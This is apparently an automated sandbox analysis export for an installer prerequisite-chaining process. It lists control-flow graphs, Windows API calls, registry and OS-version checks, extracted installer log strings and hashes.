                                          control_flow_graph 434 7b440-7b47e call 638d0 437 7b484-7b4a5 call 6c7a0 434->437 438 7bdb0-7bdb5 call 63590 434->438 446 7b4a7-7b4af call 7cf40 437->446 447 7b4b4-7b501 call 967d0 437->447 441 7bdba-7be44 call 63590 call 6c3a0 call 9f510 438->441 462 7be46-7be49 441->462 463 7be4e-7be5d 441->463 446->447 455 7b503-7b506 447->455 456 7b50b-7b50f 447->456 455->456 458 7b515-7b523 456->458 459 7b6bc 456->459 460 7b525-7b52f call 91870 458->460 461 7b534-7b5a7 call 97080 CreateThread 458->461 464 7b6be-7b6d8 459->464 475 7b610-7b617 460->475 476 7b5b2-7b5b4 call 85970 461->476 477 7b5a9-7b5af GetLastError 461->477 462->463 467 7b6de-7b6ec 464->467 468 7bd59-7bd5d 464->468 473 7bd54 467->473 474 7b6f2 call 7b090 467->474 471 7bd5f-7bd67 RegDeleteKeyA 468->471 472 7bd6d-7bd8f 468->472 471->472 478 7bd91-7bd94 472->478 479 7bd99-7bdad 472->479 483 7bd56 473->483 485 7b6f7 474->485 481 7b65a-7b661 475->481 482 7b619-7b61b 475->482 488 7b5b9-7b5c9 476->488 477->476 478->479 481->459 487 7b663-7b66c call 638d0 481->487 486 7b620-7b622 482->486 483->468 485->483 486->441 489 7b628-7b62a 486->489 487->438 498 7b672-7b6b2 call 64f00 call 88580 487->498 488->475 491 7b5cb-7b5d9 WaitForSingleObject 488->491 489->441 492 7b630-7b63a 489->492 494 7b607-7b60a CloseHandle 491->494 495 7b5db-7b5f1 GetExitCodeThread 491->495 496 7b640-7b643 492->496 497 7b6fc-7b738 call 98490 call 9ca80 call 910f0 492->497 494->475 495->494 499 7b5f3-7b5fa 495->499 496->497 500 7b649-7b64c 496->500 514 7b810-7b819 call 911e0 497->514 515 7b73e-7b745 497->515 498->459 516 7b6b4-7b6b7 498->516 499->494 502 7b5fc-7b601 TerminateThread 499->502 500->497 503 7b652-7b658 500->503 502->494 503->481 503->486 524 7b81f-7b826 514->524 525 7baca-7badb 514->525 517 7b747-7b750 call 638d0 515->517 518 7b7a1-7b7e1 call 9f0e0 call 9cfb0 call 9dda0 call 9ea70 515->518 516->459 517->438 530 7b756-7b797 call 64f00 call 88580 517->530 518->525 583 7b7e7-7b800 call 9cd80 call 9eee0 518->583 528 7b882-7b88e 524->528 529 7b828-7b831 call 638d0 524->529 531 7bae1-7baea call 638d0 525->531 532 7bb7a 525->532 537 7b890-7b897 528->537 538 7b8ee 528->538 529->438 552 7b837-7b878 call 64f00 call 88580 529->552 530->518 596 7b799-7b79c 530->596 531->438 558 7baf0-7bb2e call 64f00 * 2 531->558 533 7bb7d-7bb84 532->533 539 7bcd7-7bcdb 533->539 540 7bb8a-7bb91 533->540 546 7b8aa-7b8e2 call 87ab0 call 78c30 537->546 547 7b899-7b8a5 call 661c0 call 8d3a0 537->547 544 7b8f1-7b97b call aeae0 call 9f0e0 GetActiveWindow 538->544 554 7bced 539->554 555 7bcdd-7bceb 539->555 549 7bb97-7bba0 call 638d0 540->549 550 7bc26-7bc2d 540->550 588 7b9b4-7ba2e call ca4dc GetCurrentThreadId EnterCriticalSection LeaveCriticalSection DialogBoxParamW 544->588 589 7b97d-7b987 call ca3da 544->589 546->544 594 7b8e4-7b8ec 546->594 547->546 549->438 581 7bba6-7bbdd call 64f00 549->581 561 7bcc5-7bccc 550->561 562 7bc33-7bc3a 550->562 552->528 618 7b87a-7b87d 552->618 565 7bcf0-7bd41 call 6c3a0 call 9f510 554->565 555->565 614 7bb30-7bb39 558->614 561->539 572 7bcce-7bcd5 561->572 562->561 571 7bc40-7bc49 call 638d0 562->571 565->464 612 7bd47-7bd4f 565->612 571->438 600 7bc4f-7bc7e call 64f00 571->600 572->539 572->555 621 7bbe0-7bbe9 581->621 583->525 624 7b806-7b80b 583->624 623 7ba35-7ba4a CloseHandle 588->623 589->588 613 7b989-7b9af SetLastError CloseHandle 589->613 594->544 596->518 634 7bc80-7bc89 600->634 612->464 631 7ba58-7ba73 613->631 614->614 620 7bb3b-7bb6e call 64f00 call 88580 614->620 618->528 620->533 649 7bb70-7bb78 620->649 621->621 627 7bbeb-7bc1c call 64f00 call 88580 621->627 629 7ba56 623->629 630 7ba4c-7ba4f 623->630 624->525 627->550 652 7bc1e-7bc21 627->652 629->631 630->631 635 7ba51-7ba54 630->635 636 7ba75-7ba76 CloseHandle 631->636 637 7ba78-7ba8a 631->637 634->634 640 7bc8b-7bcbb call 64f00 call 88580 634->640 635->631 636->637 641 7ba9e-7baa7 637->641 642 7ba8c-7ba91 637->642 640->561 658 7bcbd-7bcc0 640->658 647 7baaf-7bac2 641->647 648 7baa9-7baab 641->648 642->641 646 7ba93-7ba9a 642->646 646->641 647->525 654 7bac4-7bac5 call ca486 647->654 648->647 649->533 652->550 654->525 658->561
                                          APIs
                                            • Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925
                                            • Part of subcall function 0006C7A0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,?,?,00096BD9,?,?,8000000B,D11C52E5,?,?), ref: 0006C7DD
                                            • Part of subcall function 0006C7A0: WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00096BD9,?,?,8000000B,D11C52E5,?,?), ref: 0006C80E
                                            • Part of subcall function 0006C7A0: WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,?,?,00000000,00000000,00000000,?,8000000B,D11C52E5,?,?), ref: 0006C845
                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00047F90,00000000,00000000,00000000), ref: 0007B59C
                                          • GetLastError.KERNEL32 ref: 0007B5A9
                                            • Part of subcall function 00098490: GetCurrentThreadId.KERNEL32 ref: 00098499
                                            • Part of subcall function 00098490: DestroyWindow.USER32(00000005), ref: 000984A8
                                          • WaitForSingleObject.KERNEL32(?,?), ref: 0007B5CF
                                          • GetExitCodeThread.KERNEL32(?,00000000), ref: 0007B5E9
                                          • TerminateThread.KERNEL32(?,00000000), ref: 0007B601
                                          • CloseHandle.KERNEL32(?), ref: 0007B60A
                                          • GetActiveWindow.USER32 ref: 0007B96E
                                            • Part of subcall function 00088580: InitializeCriticalSection.KERNEL32(00129AFC,D11C52E5), ref: 000885BC
                                            • Part of subcall function 00088580: EnterCriticalSection.KERNEL32(?,D11C52E5), ref: 000885C9
                                            • Part of subcall function 00088580: WriteFile.KERNEL32(00000000,?,00000000,00090EF1,00000000), ref: 000885FB
                                            • Part of subcall function 00088580: FlushFileBuffers.KERNEL32(00000000,?,00000000,00090EF1,00000000), ref: 00088604
                                            • Part of subcall function 00088580: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,0010DB14,00000001,?,00000000,00090EF1,00000000), ref: 00088686
                                            • Part of subcall function 00088580: FlushFileBuffers.KERNEL32(00000000,?,00000000,00090EF1,00000000), ref: 0008868F
                                          • SetLastError.KERNEL32(0000000E), ref: 0007B98B
                                          • CloseHandle.KERNEL32(?), ref: 0007B9A6
                                          • GetCurrentThreadId.KERNEL32 ref: 0007B9C4
                                          • EnterCriticalSection.KERNEL32(0012BCD4), ref: 0007B9E1
                                          • LeaveCriticalSection.KERNEL32(0012BCD4), ref: 0007BA04
                                          • DialogBoxParamW.USER32(000000D8,00000000,Function_00038810,00000000), ref: 0007BA21
                                          • CloseHandle.KERNEL32(?), ref: 0007BA3E
                                          • CloseHandle.KERNEL32(?), ref: 0007BA76
                                          • RegDeleteKeyA.ADVAPI32(80000001,?), ref: 0007BD67
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Thread$CloseCriticalFileHandleSection$BuffersByteCharCurrentEnterErrorFlushLastMultiWideWindowWrite$ActiveCodeCreateDeleteDestroyDialogExitFindHeapInitializeLeaveObjectParamProcessResourceSingleTerminateWait
                                          • String ID: Reboot in Progress=$ Reboot was refused=$ Reboot was required=$After running prerequisites we have:$InterbootContext$No prerequisite must be installed.$Starting installing prerequisites in basic UI mode.$Starting installing prerequisites in silent mode.$false$true
                                          • API String ID: 2893576875-478559164
                                          • Opcode ID: 35f3698ee3165c136c667c6cfc05821f5c2b3247a4c20849b30fe3564a8b78cc
                                          • Instruction ID: d6d346129d069f501dde1d5e02dd1b4a5da2a3414e423824004d31549c5c0344
                                          • Opcode Fuzzy Hash: 35f3698ee3165c136c667c6cfc05821f5c2b3247a4c20849b30fe3564a8b78cc
                                          • Instruction Fuzzy Hash: CF62BF70900289DFEB24DF68C849BEDBBF4BF05314F148269F9199B292DB789E44CB51

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 659 8ca30-8caa8 RegOpenKeyExW 661 8caae-8cadf RegQueryValueExW 659->661 662 8cd12-8cd2b 659->662 665 8cb2f-8cb5a RegQueryValueExW 661->665 666 8cae1-8caf3 call 66540 661->666 663 8cd2d 662->663 664 8cd3e-8cd59 call cc491 662->664 672 8cd34 663->672 665->662 667 8cb60-8cb71 665->667 676 8cb04-8cb1b call 66540 666->676 677 8caf5-8cb02 666->677 670 8cb7d-8cb7f 667->670 671 8cb73-8cb7b 667->671 670->662 675 8cb85-8cb8c 670->675 671->670 671->671 672->664 679 8cb90-8cb9e call 66540 675->679 683 8cb1d 676->683 684 8cb22-8cb28 676->684 680 8cb2a 677->680 686 8cba9-8cbb7 call 66540 679->686 687 8cba0-8cba4 679->687 680->665 683->684 684->680 692 8cbb9-8cbbd 686->692 693 8cbc2-8cbd0 call 66540 686->693 688 8cce4 687->688 691 8cceb-8ccf8 688->691 694 8cd0a-8cd0c 691->694 695 8ccfa 691->695 692->688 699 8cbdb-8cbe9 call 66540 693->699 700 8cbd2-8cbd6 693->700 694->662 694->679 697 8cd00-8cd08 695->697 697->694 697->697 703 8cbeb-8cbef 699->703 704 8cbf4-8cc02 call 66540 699->704 700->688 703->688 707 8cc0d-8cc1b call 66540 704->707 708 8cc04-8cc08 704->708 711 8cc1d-8cc21 707->711 712 8cc26-8cc34 call 66540 707->712 708->688 711->688 715 8cc3f-8cc4d call 66540 712->715 716 8cc36-8cc3a 712->716 719 8cc59-8cc67 call 66540 715->719 720 8cc4f-8cc54 715->720 716->688 724 8cc69-8cc6e 719->724 725 8cc70-8cc7e call 66540 719->725 721 8cce1 720->721 721->688 724->721 728 8cc80-8cc85 725->728 729 8cc87-8cc95 call 66540 725->729 728->721 732 8cc9e-8ccac call 66540 729->732 733 8cc97-8cc9c 729->733 736 8ccae-8ccb3 732->736 737 8ccb5-8ccc3 call 66540 732->737 733->721 736->721 740 8cccc-8ccda call 66540 737->740 741 8ccc5-8ccca 737->741 740->691 744 8ccdc 740->744 741->721 744->721
                                          APIs
                                          • RegOpenKeyExW.KERNELBASE(80000002,SYSTEM\CurrentControlSet\Control\ProductOptions,00000000,00020119,00000000), ref: 0008CAA0
                                          • RegQueryValueExW.KERNELBASE(00000000,ProductType,00000000,00000000,?), ref: 0008CADB
                                          • RegQueryValueExW.KERNELBASE(00000000,ProductSuite,00000000,00000000,?,?), ref: 0008CB56
                                          • RegCloseKey.KERNELBASE(00000000), ref: 0008CD2E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: QueryValue$CloseOpen
                                          • String ID: hu$BackOffice$Blade$CommunicationServer$Compute Server$DataCenter$Embedded(Restricted)$EmbeddedNT$Enterprise$Personal$ProductSuite$ProductType$SYSTEM\CurrentControlSet\Control\ProductOptions$Security Appliance$ServerNT$Small Business$Small Business(Restricted)$Storage Server$Terminal Server$WinNT
                                          • API String ID: 1586453840-2705685533
                                          • Opcode ID: 212eb2db36db870884ad7f1c6cf3dbdd72756fb756c1c5529655588c1d13d44a
                                          • Instruction ID: 628e5b2964f0637bc1b592db55b0d373b92b97f61ea2f3e871b07f9afa00980d
                                          • Opcode Fuzzy Hash: 212eb2db36db870884ad7f1c6cf3dbdd72756fb756c1c5529655588c1d13d44a
                                          • Instruction Fuzzy Hash: 4671F83070070486EB60AB21DD41FAA76F5FB51354F2044B5E99AEB6C2FB74CD858B61

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 745 8c6b0-8c726 RegOpenKeyExW 747 8c9e9-8ca02 745->747 748 8c72c-8c78d RegQueryValueExW * 2 745->748 751 8ca04-8ca0b 747->751 752 8ca15-8ca2e call cc491 747->752 749 8c7eb-8c82c RegQueryValueExW 748->749 750 8c78f-8c7c1 RegQueryValueExW 748->750 754 8c82e-8c855 call 66490 749->754 755 8c857 749->755 750->749 753 8c7c3-8c7cb 750->753 751->752 753->753 759 8c7cd-8c7d0 753->759 757 8c85d-8c865 754->757 755->757 762 8c87a-8c8a5 RegQueryValueExW 757->762 763 8c867-8c875 757->763 759->749 764 8c7d2-8c7e5 759->764 766 8c8cb-8c8f6 RegQueryValueExW 762->766 767 8c8a7-8c8c6 call 66490 762->767 763->762 764->749 769 8c8f8-8c907 766->769 770 8c94d-8c960 766->770 767->766 772 8c909-8c912 769->772 773 8c923-8c931 769->773 774 8c9a9-8c9b1 770->774 775 8c962-8c976 call cc839 770->775 778 8c914-8c921 772->778 779 8c93d-8c948 773->779 780 8c933-8c93b 773->780 776 8c9dd 774->776 777 8c9b3-8c9cf GetCurrentProcess IsWow64Process 774->777 775->774 785 8c978-8c9a6 GetModuleHandleW GetProcAddress call cc7ef 775->785 784 8c9df-8c9e4 call 8ca30 776->784 777->776 783 8c9d1-8c9db 777->783 778->773 778->778 779->770 780->779 780->780 783->784 784->747 785->774
                                          APIs
                                          • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 0008C71E
                                          • RegQueryValueExW.KERNELBASE(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 0008C765
                                          • RegQueryValueExW.KERNELBASE(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 0008C784
                                          • RegQueryValueExW.ADVAPI32(00000000,CurrentVersion,00000000,00000000,?,?), ref: 0008C7B3
                                          • RegQueryValueExW.KERNELBASE(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 0008C828
                                          • RegQueryValueExW.KERNELBASE(00000000,ReleaseId,00000000,00000000,?,?), ref: 0008C8A1
                                          • RegQueryValueExW.KERNELBASE(00000000,CSDVersion,00000000,00000000,?,?), ref: 0008C8F2
                                          • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 0008C986
                                          • GetProcAddress.KERNEL32(00000000), ref: 0008C98D
                                          • GetCurrentProcess.KERNEL32(?), ref: 0008C9C4
                                          • IsWow64Process.KERNEL32(00000000), ref: 0008C9CB
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0008CA05
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: QueryValue$Process$AddressCloseCurrentHandleModuleOpenProcWow64
                                          • String ID: hu$CSDVersion$CurrentBuildNumber$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$IsWow64Process$ReleaseId$Software\Microsoft\Windows NT\CurrentVersion$kernel32
                                          • API String ID: 2654979339-1772040162
                                          • Opcode ID: 345f773912129231738aad9bb8a9fc731c1817123f296788ed9d00206e2845c9
                                          • Instruction ID: 8c38c178a130c5fa7d72742c2af890a2234ffa39143e19260c7e2608bdc250dd
                                          • Opcode Fuzzy Hash: 345f773912129231738aad9bb8a9fc731c1817123f296788ed9d00206e2845c9
                                          • Instruction Fuzzy Hash: 819190B1900228EEEB60DF50CC45FEAB7F5FB44714F0042EAE549A7690EB759AA4CF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1076 91b40-91b85 1077 91b8b-91b8e 1076->1077 1078 920b2-920b7 call 63590 1076->1078 1077->1078 1080 91b94-91ba6 1077->1080 1081 920bc-920c6 call 63590 1078->1081 1082 91bac-91bb2 call a0a60 1080->1082 1083 92090-920af call cc491 1080->1083 1089 91bb7-91bb9 1082->1089 1090 91bbf-91bcc call a0db0 1089->1090 1091 91fd6-91fdd 1089->1091 1090->1091 1098 91bd2-91bd5 1090->1098 1093 9207d-92080 1091->1093 1094 91fe3-91fec call 638d0 1091->1094 1093->1078 1097 92082-92088 1093->1097 1094->1081 1101 91ff2-92018 call 64f00 1094->1101 1097->1083 1098->1078 1100 91bdb-91bed 1098->1100 1102 91bef-91bf2 1100->1102 1103 91bf4-91c04 call cde0c 1100->1103 1101->1078 1116 9201e-92029 1101->1116 1104 91c16-91c21 1102->1104 1110 91c0b-91c11 1103->1110 1111 91c06-91c09 1103->1111 1104->1078 1109 91c27-91c36 1104->1109 1113 91c38-91c3b 1109->1113 1114 91c3d-91c4f call cde0c 1109->1114 1115 91c13 1110->1115 1111->1115 1117 91c5e-91c7a 1113->1117 1128 91c51-91c54 1114->1128 1129 91c56-91c5c 1114->1129 1115->1104 1119 9202b-92030 1116->1119 1120 9204d-92073 call 88580 1116->1120 1122 91ccc-91cd6 1117->1122 1123 91c7c-91c90 call cc839 1117->1123 1124 92033-9203c 1119->1124 1120->1093 1140 92075-92078 1120->1140 1125 91cd8-91cec GetCurrentProcess 1122->1125 1126 91d15-91d17 1122->1126 1136 91cc9 1123->1136 1137 91c92-91cc6 GetModuleHandleW GetProcAddress call cc7ef 1123->1137 1124->1124 1131 9203e-92048 call 64f00 1124->1131 1133 91d1d-91d20 1125->1133 1144 91cee-91cf7 1125->1144 1126->1093 1126->1133 1128->1117 1129->1117 1131->1120 1133->1078 1135 91d26-91d36 1133->1135 1141 91d38-91d3b 1135->1141 1142 91d3d-91d4d call cde0c 1135->1142 1136->1122 1137->1136 1140->1093 1145 91d5c-91d6b 1141->1145 1155 91d4f-91d52 1142->1155 1156 91d54-91d5a 1142->1156 1148 91cf9-91cfd 1144->1148 1149 91d01-91d05 1144->1149 1151 91e0b-91e0f 1145->1151 1152 91d71-91d7a call 638d0 1145->1152 1153 91cff 1148->1153 1154 91d07-91d0a 1148->1154 1149->1133 1149->1154 1158 91e2d 1151->1158 1159 91e11-91e14 1151->1159 1152->1081 1165 91d80-91da6 call 64f00 1152->1165 1153->1133 1154->1078 1160 91d10 1154->1160 1155->1145 1156->1145 1163 91e30-91e82 1158->1163 1159->1078 1162 91e1a-91e25 1159->1162 1160->1097 1162->1083 1166 91e2b 1162->1166 1163->1078 1164 91e88-91e8f 1163->1164 1167 91eae-91eb6 1164->1167 1168 91e91-91eac call a3000 1164->1168 1165->1078 1181 91dac-91db7 1165->1181 1166->1163 1170 91eb8-91eba 1167->1170 1171 91ebc-91ebf 1167->1171 1168->1167 1174 91ed5-91edf 1170->1174 1175 91ec1-91ec4 1171->1175 1176 91ec6-91ece 1171->1176 1178 91ee1 1174->1178 1179 91ee4-91eeb 1174->1179 1175->1174 1176->1174 1178->1179 1179->1083 1182 91ef1-91efa call 638d0 1179->1182 1183 91db9-91dbe 1181->1183 1184 91ddb-91e01 call 88580 1181->1184 1182->1081 1191 91f00-91f26 call 64f00 1182->1191 1186 91dc1-91dca 1183->1186 1184->1151 1193 91e03-91e06 1184->1193 1186->1186 1189 91dcc-91dd6 call 64f00 1186->1189 1189->1184 1191->1078 1197 91f2c-91f39 1191->1197 1193->1151 1198 91f3b 1197->1198 1199 91f7a 1197->1199 1200 91f49-91f4e 1198->1200 1201 91f6c-91f71 1198->1201 1202 91f5e-91f63 1198->1202 1203 91f50-91f55 1198->1203 1204 91f73-91f78 1198->1204 1205 91f42-91f47 1198->1205 1206 91f65-91f6a 1198->1206 1207 91f57-91f5c 1198->1207 1208 91f7f-91f81 1199->1208 1200->1208 1201->1208 1202->1208 1203->1208 1204->1208 1205->1208 1206->1208 1207->1208 1209 91f84-91f8d 1208->1209 1209->1209 1210 91f8f-91fc3 call 64f00 call 88580 1209->1210 1210->1083 1215 91fc9-91fd1 1210->1215 1215->1083
                                          APIs
                                            • Part of subcall function 000A0DB0: GetSystemDefaultLangID.KERNEL32(D11C52E5,?,00000000,?,000000C9), ref: 000A0DE6
                                          • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,00000000), ref: 00091CA3
                                          • GetProcAddress.KERNEL32(00000000), ref: 00091CAA
                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,00000000), ref: 00091CE0
                                          Strings
                                          • Undefined, xrefs: 00091F7A
                                          • Not selected for install., xrefs: 00091F73, 00091F93, 00091F94
                                          • Wrong OS or Os language for:, xrefs: 0009200B
                                          • Search result:, xrefs: 00091F19
                                          • No acceptable version found. It is already downloaded and it will be installed., xrefs: 00091F65
                                          • No acceptable version found., xrefs: 00091F6C
                                          • No acceptable version found. Operating System not supported., xrefs: 00091F5E
                                          • No acceptable version found. It must be downloaded manually from a site., xrefs: 00091F57
                                          • An acceptable version was found., xrefs: 00091F42
                                          • No acceptable version found. It must be installed from package., xrefs: 00091F49
                                          • kernel32, xrefs: 00091C9E
                                          • Searching for:, xrefs: 00091D99
                                          • IsWow64Process2, xrefs: 00091C99
                                          • No acceptable version found. It must be downloaded., xrefs: 00091F50
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: AddressCurrentDefaultHandleLangModuleProcProcessSystem
                                          • String ID: An acceptable version was found.$IsWow64Process2$No acceptable version found.$No acceptable version found. It is already downloaded and it will be installed.$No acceptable version found. It must be downloaded manually from a site.$No acceptable version found. It must be downloaded.$No acceptable version found. It must be installed from package.$No acceptable version found. Operating System not supported.$Not selected for install.$Search result:$Searching for:$Undefined$Wrong OS or Os language for:$kernel32
                                          • API String ID: 323535258-3110232006
                                          • Opcode ID: f3854512adb1f258a86ed310dad844b327b7906430e0a45b5560748c959ad177
                                          • Instruction ID: a884877aca4c4432559197242746a7d3aad8b667c8a55cbe66ba886747ea1f30
                                          • Opcode Fuzzy Hash: f3854512adb1f258a86ed310dad844b327b7906430e0a45b5560748c959ad177
                                          • Instruction Fuzzy Hash: BDF1CF70A00605DFDF24DFA8C994BEEB7F2BF44310F144269E4269B2D2DB71A946DB41

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1440 64300-6436c 1441 6436e-64382 call cc839 1440->1441 1442 643a9-643b0 1440->1442 1441->1442 1449 64384-643a6 call ccb4b call cc7ef 1441->1449 1444 643b6-643bd call 827b0 1442->1444 1445 645dd-64619 call 62060 call cc491 1442->1445 1452 64503-64515 GetTempPathW 1444->1452 1453 643c3-643ce 1444->1453 1449->1442 1459 64517-64519 1452->1459 1456 643d0-643e4 call cc839 1453->1456 1457 6441a-64421 1453->1457 1456->1457 1471 643e6-64417 GetModuleHandleW GetProcAddress call cc7ef 1456->1471 1462 64435-6445f GetWindowsDirectoryW call d1bb6 1457->1462 1463 64423-64433 1457->1463 1459->1445 1465 6451f-64543 1459->1465 1476 64462-64471 PathFileExistsW 1462->1476 1463->1476 1469 64546-6454f 1465->1469 1469->1469 1470 64551-6458d call 63b00 call 66ab0 1469->1470 1485 645c0-645d6 1470->1485 1486 6458f-645a4 1470->1486 1471->1457 1476->1459 1479 64477-644bc call 829b0 call 82ba0 * 2 call 83110 1476->1479 1501 644f2-64501 call 82a50 1479->1501 1502 644be-644ec CreateDirectoryW 1479->1502 1485->1445 1488 645b6-645bd call cc49f 1486->1488 1489 645a6-645b4 1486->1489 1488->1485 1489->1488 1491 6461a-646e9 call d187f call 64300 call 62060 call 64260 call 646f0 call 64260 call cc491 1489->1491 1501->1459 1502->1501
                                          APIs
                                          • GetModuleHandleW.KERNEL32(Kernel32.dll,GetTempPath2W,00000000), ref: 000643F7
                                          • GetProcAddress.KERNEL32(00000000), ref: 000643FE
                                          • GetWindowsDirectoryW.KERNEL32(?,00000104,D11C52E5,?,00000000), ref: 00064441
                                          • PathFileExistsW.KERNELBASE(?), ref: 00064469
                                          • CreateDirectoryW.KERNEL32(?,?,S-1-5-32-544,?,00000001,S-1-5-18,?,00000001), ref: 000644EC
                                            • Part of subcall function 000CC839: EnterCriticalSection.KERNEL32(00128FDC,?,00000000,?,00063976,001298D8,D11C52E5,00000000,?,000EBD9D,000000FF,?,0009D1A5,D11C52E5,?,00000000), ref: 000CC844
                                            • Part of subcall function 000CC839: LeaveCriticalSection.KERNEL32(00128FDC,?,00063976,001298D8,D11C52E5,00000000,?,000EBD9D,000000FF,?,0009D1A5,D11C52E5,?,00000000), ref: 000CC881
                                          • GetTempPathW.KERNEL32(00000104,?,D11C52E5,?,00000000), ref: 0006450F
                                            • Part of subcall function 000CC7EF: EnterCriticalSection.KERNEL32(00128FDC,00000000,?,000639E7,001298D8,000FD280), ref: 000CC7F9
                                            • Part of subcall function 000CC7EF: LeaveCriticalSection.KERNEL32(00128FDC,?,000639E7,001298D8,000FD280), ref: 000CC82C
                                            • Part of subcall function 000CC7EF: RtlWakeAllConditionVariable.NTDLL ref: 000CC8A3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: CriticalSection$DirectoryEnterLeavePath$AddressConditionCreateExistsFileHandleModuleProcTempVariableWakeWindows
                                          • String ID: GetTempPath2W$Kernel32.dll$S-1-5-18$S-1-5-32-544$URL$\SystemTemp\
                                          • API String ID: 573185392-3071440713
                                          • Opcode ID: 9754cace9885bfd55c7345ad1e201059021e1fbcef133733239ec7f473b11c31
                                          • Instruction ID: 2b64a2ac6dc26fdad1aa1ddc89634d00bb4843fc358d75caae1dcb1ae6230608
                                          • Opcode Fuzzy Hash: 9754cace9885bfd55c7345ad1e201059021e1fbcef133733239ec7f473b11c31
                                          • Instruction Fuzzy Hash: 7FA1B171D04218AFDB20DFA4DC89BEEB7B5FB04710F144299E509A7292EB746E84CF51

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
